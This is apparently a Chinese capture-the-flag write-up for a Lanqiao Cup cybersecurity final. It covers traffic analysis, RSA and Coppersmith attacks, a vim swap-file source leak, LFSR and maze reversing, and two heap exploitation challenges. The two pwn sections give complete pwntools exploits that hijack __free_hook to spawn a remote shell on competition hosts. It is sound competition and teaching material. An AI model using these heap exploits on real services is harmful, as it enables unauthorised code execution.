第二届蓝桥杯网络安全春秋赛决赛WP | 风尘孤狼
0%

第二届蓝桥杯网络安全春秋赛决赛WP

image-20240602152523609

Sqldata

打开附件,发现是SQL注入流量,最后三个流量读取了flag

image-20240602150744540 image-20240602150757475

去除冗余数据,base32解码即可得到flag

image-20240602150818345

其他两段同理

image-20240602150834608 image-20240602150847599

得到flag

flag{a0d78ce4-8072-4e14-939b-cd78392a34f4}

orsa

RSA解密,p^q利用剪枝算法来反求出pq的具体值

import sys
def search_pq(p, q):
    l = len(p)
    data = 1024
    tmp0 = p + (data - l) * "0"
    tmp1 = p + (data - l) * "1"
    tmq0 = q + (data - l) * "0"
    tmq1 = q + (data - l) * "1"
    if (int(tmp0, 2) < int(tmq0, 2)):
        return
    if (int(tmp0, 2) * int(tmq0, 2) > n):
        return
    elif (int(tmp1, 2) * int(tmq1, 2) < n):
        return

    if (l == 1024):
        pp = int(tmp0, 2)
        qq = int(tmq0, 2)
        print(pp)
        print(qq)


    else:
        if (a1[l] == "1"):
            search_pq(p + "1", q + "0")
            search_pq(p + "0", q + "1")
        else:
            search_pq(p + "0", q + "0")
            search_pq(p + "1", q + "1")


n = 17626392212279375795672017937809976432819563702015014286064950438576962829301599887424832742209378051687822421703316130192020970941676594734073337248659576926575409659609517516571173738767919910420753227081676651612998092451924002173008602428197941864705971469948068681614565308570894501692597579202715649837935866803849514492857112054684416002104812289864567355883456430042148145799939586951625034025707736407538180102611049391900268512837878848560854682228074168583637013599117615137668041018375469762511166636852906124939919673060420023287056647653925858064479788117341253962554259945839612998710315288660915390543
pq = 89884656743115795386465259394234594567546130199363180708002290807487206865805972417279697354950018128772500146302322028511803484668179089220615193364070482772703954931838536681720469410883560665407216805250546708783249336389502139655454481491246187888957907623426449041503701395627092371546762192998918782974
c = 15353396223606692204253354833233067114199996528916790997604347786403456282543682138297916126293312135032558534636934734869807941321225203411903129720253717772393747501562673454929926513518070604475902448091242766771949079887693901769148980379739977262744450451505364499178273015141584500087580192421701748750836209109487246092666869218702274453456508100997255478700791800921353303116505094139865456937359493463506797519849430510917719026559539965791391845554621890357123251984800601113044355173099746170929775677870786702159862756844911828296490556988779325757045280115604388611000559427604324936039138667153453277427
e = 65537

sys.setrecursionlimit(1500)
a1 = "0" + str(bin(pq)[2:])


p = "1"
q = "1"
search_pq(p, q)

得到p和q

p=158320041595963346910607953497511695075001758433674691713888017753105291655382379900703870377303844238937087600854108033755563228292880298246860058356388698143578740680103975150537695645088531644826282534286488017240804391039495063039781633438590238645412596002890423433811285116929743283890906195989612887623
 q=111333928633384039248787825266058380102564302610683774296735138323796885440325522301302649130522397716710525859927661834447462648801231320790381330762200244351951324675928016721869115489370317719639192101136412298885878342628245496531456558511102222180443848548963347176474520255844896524252794434180745626041

然后正常RSA解密即可得到flag

from Crypto.Util.number import *
p=158320041595963346910607953497511695075001758433674691713888017753105291655382379900703870377303844238937087600854108033755563228292880298246860058356388698143578740680103975150537695645088531644826282534286488017240804391039495063039781633438590238645412596002890423433811285116929743283890906195989612887623
q=111333928633384039248787825266058380102564302610683774296735138323796885440325522301302649130522397716710525859927661834447462648801231320790381330762200244351951324675928016721869115489370317719639192101136412298885878342628245496531456558511102222180443848548963347176474520255844896524252794434180745626041
e=65537
c = 15353396223606692204253354833233067114199996528916790997604347786403456282543682138297916126293312135032558534636934734869807941321225203411903129720253717772393747501562673454929926513518070604475902448091242766771949079887693901769148980379739977262744450451505364499178273015141584500087580192421701748750836209109487246092666869218702274453456508100997255478700791800921353303116505094139865456937359493463506797519849430510917719026559539965791391845554621890357123251984800601113044355173099746170929775677870786702159862756844911828296490556988779325757045280115604388611000559427604324936039138667153453277427
n=p*q
phi=(p - 1) * (q - 1)

d = inverse(e, phi)
m = long_to_bytes(pow(c, d, n))
print(m)
image-20240602150953572

flag{2c50b32a-fe84-4f1f-a645-22dcc4caa9b9}

0x100

nc得到源码

image-20240602151020457

发现flag部分数据丢失,利用明文m的高位攻击来恢复

同时需要res = f.small_roots(X = 256^i,beta=0.48)

脚本如下

from Crypto.Util.number import *
from gmpy2 import *

c = 33555838736521638336508564179240154875721919208162692653621849617985366203999316090924212552099132840976315135821908280824203158812899702896949214723368112127500471190187443464058193634562219092511168113924749082876766345406995267519131355826704095496960006139716868408593517285137109832742755581112433110173
n = 74224694190378245570662914514197080111808324634781677418701441263524880254209023098028414752153116247558921852342579052620848368822288495663953364161190265839271585860352129564216547402136600849476321773029405114130903399735699724437227139229796496995834686374625593947966539751536221128712735603857178093087
e = 3

for i in range(100):
    R = PolynomialRing(Zmod(n), 'x')
    x = R.gen()
    dm = b"flag{" + b"\x00" * i + b"}"
    pad = b"\x00" * (114514 - len(dm))
    
    mhigh = bytes_to_long(dm + pad)
    f = (mhigh + x * 256 ** (len(pad) + 1)) ** e - c
    f = f.monic()

    res = f.small_roots(X=256**i, beta=0.48)
    print(res)
    
    if res:
        flag = mhigh + int(res[0]) * 256 ** (len(pad) + 1)
        print(long_to_bytes(int(flag))[:43])

image-20240602151050617

得到flag

flag{8de8cc07-2ca0-48fd-a13e-1ac1d0b38743}

babyheap

image-20240602151114050

存在UAF漏洞

from pwn import *

li = lambda x: print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x: print('\x1b[01;38;5;1m' + x + '\x1b[0m')

context(os='linux', arch='amd64', log_level='debug')
p = remote('8.147.132.99', 21800)
elf = ELF('./pwn')
libc = ELF("./libc.so.6")

# Initial allocations
p.sendlineafter(">> \n", "1")
p.sendlineafter("index: \n", "0")
p.sendlineafter("size: ", "96")

p.sendlineafter(">> \n", "1")
p.sendlineafter("index: \n", "1")
p.sendlineafter("size: ", "96")

p.sendlineafter(">> \n", "555")
p.sendlineafter("find me\n", "1024")

p.sendlineafter(">> \n", "1")
p.sendlineafter("index: \n", "2")
p.sendlineafter("size: ", "96")

# Freeing chunks
p.sendlineafter(">> \n", "2")
p.sendlineafter("index: \n", "1")

p.sendlineafter(">> \n", "2")
p.sendlineafter("index: \n", "0")

# Corrupting freed chunk
p.sendlineafter(">> \n", "3")
p.sendlineafter("index: \n", "0")
p.send(b'\n')

# Allocating more chunks
p.sendlineafter(">> \n", "1")
p.sendlineafter("index: \n", "3")
p.sendlineafter("size: ", "96")

p.sendlineafter(">> \n", "1")
p.sendlineafter("index: \n", "4")
p.sendlineafter("size: ", "96")

# Overwriting next chunk's header
p.sendlineafter(">> \n", "3")
p.sendlineafter("index: \n", "4")
p.send(p64(0) + p64(0x481) + b'\n')

# Free chunk to merge into top chunk
p.sendlineafter(">> \n", "2")
p.sendlineafter("index: \n", "1")

# Leak libc address
p.sendlineafter(">> \n", "4")
p.sendlineafter("index: \n", "1")
libc_base = u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00')) - 96 - 0x10 - libc.sym['__malloc_hook']
li(hex(libc_base))

# Calculate necessary addresses
free_hook = libc_base + libc.sym['__free_hook']
system_addr = libc_base + libc.sym['system']
bin_sh = libc_base + next(libc.search(b'/bin/sh\x00'))

# Freeing and corrupting chunks to overwrite free_hook
p.sendlineafter(">> \n", "1")
p.sendlineafter("index: \n", "5")
p.sendlineafter("size: ", "96")

p.sendlineafter(">> \n", "2")
p.sendlineafter("index: \n", "2")

p.sendlineafter(">> \n", "2")
p.sendlineafter("index: \n", "5")

p.sendlineafter(">> \n", "3")
p.sendlineafter("index: \n", "4")
p.send(p64(0) + p64(0x71) + p64(free_hook) + b'\n')

# Write system address and "/bin/sh" string to chunks
p.sendlineafter(">> \n", "1")
p.sendlineafter("index: \n", "6")
p.sendlineafter("size: ", "96")

p.sendlineafter(">> \n", "3")
p.sendlineafter("index: \n", "6")
p.send(b'/bin/sh\x00\n')

p.sendlineafter(">> \n", "1")
p.sendlineafter("index: \n", "7")
p.sendlineafter("size: ", "96")

p.sendlineafter(">> \n", "3")
p.sendlineafter("index: \n", "7")
p.send(p64(system_addr) + b'\n')

# Trigger exploit
p.sendlineafter(">> \n", "2")
p.sendlineafter("index: \n", "6")

p.interactive()
image-20240602151138849

得到flag

flag{5dd4ce7c-da45-434f-be5b-32028500cae9}

backleak

源码泄露,dirsearch扫目录

image-20240602151206221

访问得到提示,vi.php

image-20240602151225491

恢复文件

vim -r index.php.swp

得到源码

<!DOCTYPE html>
<html>
<head>
    <title>backleak</title>
    <meta http-equiv="Content-Type" content="text/html; charset=utf8">

    <style>
        body {
            display: flex;
            justify-content: center;
            align-items: center;
            flex-direction: column;
            height: 100vh;
            margin: 0;
            background: linear-gradient(to bottom left, #fff, #f8f9fa);
            font-family: 'Helvetica Neue', Arial, sans-serif;
            color: #343a40;
        }

        img {
            width: 300px;
            height: 300px;
            border-radius: 50%;
            box-shadow: 0 0 20px rgba(0, 0, 0, 0.1);
        }

        h1 {
            font-size: 2em;
            text-shadow: none;
            color: #212529;
            width: 60%;
            word-wrap: break-word;
        }
    </style>
</head>

<body>
    <h1>你知道^M是什么吗?在哪里经常见过呢?</h1>
</body>
<!-- vi.php -->
</html>

访问vi.php,post传参flag=ok,即可得到flag

image-20240602151244203

得到flag

flag{a72b0871-46cc-44b4-a3ab-9559b0ae0370}

gettingstarted

image-20240602151303499

存在OFF BY NULL漏洞

from pwn import *
from ctypes import *

li = lambda x: print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x: print('\x1b[01;38;5;1m' + x + '\x1b[0m')

context(os='linux', arch='amd64', log_level='debug')



p = remote('8.147.131.4', 25825)
elf = ELF('./easy')

libc = cdll.LoadLibrary('./libc-2.27.so')
seed = libc.time(0)
libc.srand(seed)


a = [libc.rand() % 80 + 32 for _ in range(7)]
p.sendlineafter("please login >>>>\n", bytes(a))

for i in range(10):
    p.sendlineafter(":", "1")
    p.sendlineafter("Index: ", str(i))
    p.sendlineafter("Size ", "144")

for i in range(7):
    p.sendlineafter(":", "4")
    p.sendlineafter("Index: ", str(i))

p.sendlineafter(":", "3")
p.sendlineafter("Index: ", "7")
libc_base = u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00')) - 0x3ebd30
li(hex(libc_base))

free_hook = libc_base + libc.sym['__free_hook']
system_addr, bin_sh = libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00'))

for i in range(10):
    p.sendlineafter(":", "1")
    p.sendlineafter("Index: ", str(i + 10))
    p.sendlineafter("Size ", "104")

p.sendlineafter(":", "2")
p.sendlineafter("Index: ", "17")
p.sendlineafter("Content: ", b'a' * 104 + p8(0xe1))
p.sendlineafter(":", "4")
p.sendlineafter("Index: ", "18")
p.sendlineafter(":", "4")
p.sendlineafter("Index: ", "19")
p.sendlineafter(":", "1")
p.sendlineafter("Index: ", "18")
p.sendlineafter("Size ", "216")
p.sendlineafter(":", "2")
p.sendlineafter("Index: ", "18")
p.sendlineafter("Content: ", b'a' * 104 + p64(0x71) + p64(free_hook) + b'\n')

p.sendlineafter(":", "1")
p.sendlineafter("Index: ", "27")
p.sendlineafter("Size ", "104")
p.sendlineafter(":", "2")
p.sendlineafter("Index: ", "27")
p.sendlineafter("Content: ", b'/bin/sh\x00\n')

p.sendlineafter(":", "1")
p.sendlineafter("Index: ", "28")
p.sendlineafter("Size ", "104")
p.sendlineafter(":", "2")
p.sendlineafter("Index: ", "28")
p.sendlineafter("Content: ", p64(system_addr) + b'\n')

p.sendlineafter(":", "4")
p.sendlineafter("Index: ", "27")

p.interactive()
image-20240602151327381

flag{e9dc7427-af2d-4d62-8d8c-cc3656de5a2c}

dirty_data

连接SSH之后发现html下存在源码服务

image-20240602151350899

找到mysql账密

mysql_connect(‘localhost’,‘ctf’,‘ctf123’);

连接之后发现存在一串字段是冗余的

image-20240602151407032

删除第四段数据即可

delete from news where id=4;
image-20240602151425305

稍等一会,即可读取flag

image-20240602151440177

flag{655eba17-be43-4142-9630-9562065bb43b}

LFSR

Lfsr加密,ida反编译可以看到加密逻辑

image-20240602151508511

跟进lfsr_cipher函数

image-20240602151521208 image-20240602151531423

逆向一下即可,脚本如下

v5=[0x16,0x54,0x0FD,0x29,0x5C,0x23,0x0EA,0x0A1,0x56,0x0D7,0x3D,0x49,0x72,0x0A6,0x0F5,0x53,0x0D0,0x0E9,0x41,0x82,0x0ED,0x0D4,0x42,0x16,0x0FC,0x2F,0x9F,0x0B7,0x44,0x51,0x2B,0x3C,0x0E5,0x0F6,0x5,0x89,0x0ED,0x0DE,0x44,0x0DE,0x0BE,0x93]


flag=''
v6 = 44257
v7 = v6
a1 = v7

# print(len(v5))
for i in range(42):
    v2 = a1 & 1
    #print(v2,end="")

    a1 >>= 1
    if (v2):
        a1 ^= 46080
        # print(a1,end=" ")
    flag+=chr(((v5[i])^a1) & 0xff)
    print(flag)

得到flag

image-20240602151600024

flag{0ce4feed-01a1-4694-aa8d-e11c5d9522ec}

Ezmaze

迷宫题,有upx壳

image-20240602151621329

改UPX特征然后脱壳,UPX应该都是大写才对

image-20240602151633905 image-20240602151655078

脱壳之后反编译,查看主体逻辑发现地图

101101
101001
100101
110101
100001
111111

分析代码发现移动按键

wz=[10^0x32,0^0x32,6^0x32,94^0x32]
for i in range(4):
    print(chr(wz[i]),end=" ")
image-20240602151733662

走出地图

22l22ll8888
image-20240602151751215

md5即为flag

from hashlib import md5

data="22l22ll8888"


print("flag{"+md5(bytes(data,'utf-8')).hexdigest()+"}")
image-20240602151817316

flag{c534af59b12444af2cefebd25f0efca4}

制作不易,如若感觉写的不错,欢迎打赏